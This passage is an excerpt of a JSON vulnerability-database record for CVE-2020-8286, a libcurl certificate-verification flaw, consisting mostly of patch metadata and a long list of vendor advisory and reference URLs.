        "id": "CVE-2020-8286"
      }
    ]
  },
  "id": "VAR-202012-1279",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-04-10T22:46:25.229000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "HAXX libcurl Repair measures for trust management problem vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=137265"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-295",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8286"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-200951.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210122-0007/"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht212325"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht212326"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht212327"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2021/dsa-4881"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/apr/50"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/apr/51"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/apr/54"
      },
      {
        "trust": 1.7,
        "url": "https://security.gentoo.org/glsa/202012-14"
      },
      {
        "trust": 1.7,
        "url": "https://curl.se/docs/cve-2020-8286.html"
      },
      {
        "trust": 1.7,
        "url": "https://hackerone.com/reports/1048457"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00029.html"
      },
      {
        "trust": 1.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nzuvsqhn2eshmjxnq2z7t2eelbb5hjxg/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/daehe2s2qlo4ao4meeyl75nb7sah5psl/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.8,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/daehe2s2qlo4ao4meeyl75nb7sah5psl/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/nzuvsqhn2eshmjxnq2z7t2eelbb5hjxg/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-20305"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2017-14502"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3449"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3450"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-3842"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-13776"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-24977"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29363"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/libcurl-man-in-the-middle-via-inferior-ocsp-verification-34068"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164192/red-hat-security-advisory-2021-3556-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2657"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1841"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0635"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-curl-libcurl-vulnerabilites-impacting-aspera-high-speed-transfer-server-aspera-high-speed-transfer-endpoint-aspera-desktop-client-4-0-and-earlier-cve-2020-8284-cve-2020-8286-c/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042615"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1409.2"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2180"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/security-alerts/cpujul2021.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162629/red-hat-security-advisory-2021-1610-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021061010"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021052026"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160706/gentoo-linux-security-advisory-202012-14.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072050"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2228"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6520474"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht212327"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2471"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021071516"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4058"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160423/ubuntu-security-notice-usn-4665-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051406"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1866"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1700"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2711"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042704"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4343/"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-159-10"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0319/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072122"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1114"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2365"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-curl-affect-powersc-cve-2020-8284-cve-2020-8285-and-cve-2020-8286/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163276/red-hat-security-advisory-2021-2543-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162358/apple-security-advisory-2021-04-26-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163496/red-hat-security-advisory-2021-2705-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062703"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021092220"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4364/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4506/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163267/red-hat-security-advisory-2021-2532-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2054"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062315"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-qradar-analyst-workflow-add-on-to-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3141"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-27219"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24977"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8927"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20305"
      },
      {
        "trust": 0.3,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26116"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27619"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27219"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3326"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28500"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3520"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3537"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3518"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23337"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3516"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3517"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13543"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9951"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9948"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13584"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13543"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13584"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9983"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28362"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/jaeger/jaeger_install/rhb"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23336"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27918"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27918"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33196"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29418"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28851"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29482"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27358"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23369"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21321"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23364"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23343"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21309"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23383"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28918"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28851"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3560"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000858"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1730"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25217"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3016"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3377"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21272"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29477"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27292"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29478"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23839"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33623"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21322"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14347"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36322"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25712"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25704"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19528"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0431"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14363"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14345"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18811"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14360"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14314"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14360"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14356"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27786"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25643"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24394"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0431"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-0342"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18811"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14344"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-u"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14345"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14344"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25285"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35508"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28974"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15437"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25284"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14346"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14356"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11608"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2479"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23240"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3139"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23239"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36242"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
